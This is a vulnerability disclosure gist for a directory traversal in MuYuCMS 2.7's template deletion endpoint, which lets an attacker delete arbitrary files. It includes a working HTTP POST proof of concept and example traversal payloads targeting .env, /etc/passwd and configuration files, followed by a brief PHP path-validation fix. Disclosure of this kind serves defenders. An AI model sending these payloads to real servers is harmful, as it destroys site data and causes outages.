Skip to content

Instantly share code, notes, and snippets.

@b1uel0n3

b1uel0n3/MuYuCMS_2.7_Template_Directory_Traversal.md

Last active December 10, 2025 01:05
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save b1uel0n3/275ac353537ecf4c8973d33fa0d5b0fe to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save b1uel0n3/275ac353537ecf4c8973d33fa0d5b0fe to your computer and use it in GitHub Desktop.
Download ZIP
MuYuCMS 2.7 - Template Management Directory Traversal (CVE Request)
Raw
MuYuCMS_2.7_Template_Directory_Traversal.md

MuYuCMS 2.7 Template Management Directory Traversal

Vulnerability Details

  • Product: MuYuCMS
  • Version: 2.7
  • Type: Directory Traversal → Arbitrary File Deletion
  • CVSS: 8.1 High
  • Project URL: https://gitee.com/MuYuCMS/MuYuCMS
  • File: application/admin/controller/Template.php
  • Method: tempdel
  • Parameters: temn, tp

Proof of Concept

POST /admin/template/tempdel HTTP/1.1
Content-Type: application/x-www-form-urlencoded

temn=home_temp&tp=../../../config/database.php

Example Payloads:

tp=../../../.env&temn=home_temp
tp=../../../../etc/passwd&temn=home_temp
tp=../../../application/config.php&temn=home_temp

Impact

  • Delete critical system files (Denial of Service)
  • Remove security configurations (Privilege Escalation)
  • Permanent data loss

Remediation

// Add path validation before file deletion
$allowed_base = realpath('/template/directory/');
$target_path = realpath($base_path . $temn);

if (strpos($target_path, $allowed_base) !== 0) {
    return json(['error' => 'Path traversal detected']);
}

References

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment